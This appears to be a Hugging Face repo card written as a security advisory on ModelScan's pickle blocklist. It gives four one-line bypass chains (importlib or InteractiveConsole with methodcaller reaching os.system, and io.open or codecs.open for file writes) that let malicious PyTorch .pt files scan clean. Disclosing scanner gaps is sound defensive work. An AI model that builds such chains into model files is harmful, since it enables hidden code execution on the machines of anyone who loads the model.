YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ModelScan Blocklist Bypass β PyTorch .pt Models (4 Independent Chains)
Summary
ModelScan's unsafe_globals blocklist has systemic gaps allowing arbitrary code execution via crafted PyTorch .pt model files that scan clean. Four independent bypass chains are demonstrated, each requiring a different blocklist addition to fix.
Affected Version
ModelScan <= 0.8.8 (latest as of 2026-03-09)
Vulnerability Details
ModelScan's pickle scanner (modelscan/tools/picklescanner.py) extracts GLOBAL/INST/STACK_GLOBAL opcodes and checks them against unsafe_globals in settings.py. The blocklist covers os, subprocess, builtins.eval, builtins.exec, operator.attrgetter, etc. β but misses 5 critical modules/functions that chain to full RCE:
| Missing Entry | Why It's Dangerous |
|---|---|
importlib.import_module |
Imports ANY blocked module (os, subprocess, etc.) at runtime |
operator.methodcaller |
Calls any method on any object β chains with imported modules |
code.InteractiveConsole |
Executes arbitrary Python source code |
io.open |
Arbitrary file creation/overwrite |
codecs.open |
Arbitrary file creation/overwrite |
Exploit Chains
Chain 1: importlib + methodcaller (Full RCE, 132 bytes)
operator.methodcaller('system', cmd)(importlib.import_module('os'))
Chain 2: code.InteractiveConsole + methodcaller (Full RCE, 150 bytes)
operator.methodcaller('push', 'import os; os.system(cmd)')(code.InteractiveConsole())
Chain 3: io.open (Arbitrary file write, 60 bytes)
io.open('/path/to/file', 'w')
Chain 4: codecs.open (Arbitrary file write, 64 bytes)
codecs.open('/path/to/file', 'w')
Reproduction
pip install torch modelscan
python poc.py
Expected output:
- ModelScan reports "No issues found" for all 4 malicious .pt files
- All 4 chains achieve code execution when loaded via
torch.load(file, weights_only=False)
Impact
An attacker publishes a malicious PyTorch model on HuggingFace or any model registry. ModelScan (the safety scanner recommended by Protect AI / Palo Alto Networks) scans the file and reports it as safe. When a victim loads the model, arbitrary code executes on their machine.
This bypasses the primary defense that ML engineers rely on to validate model file safety before loading untrusted models.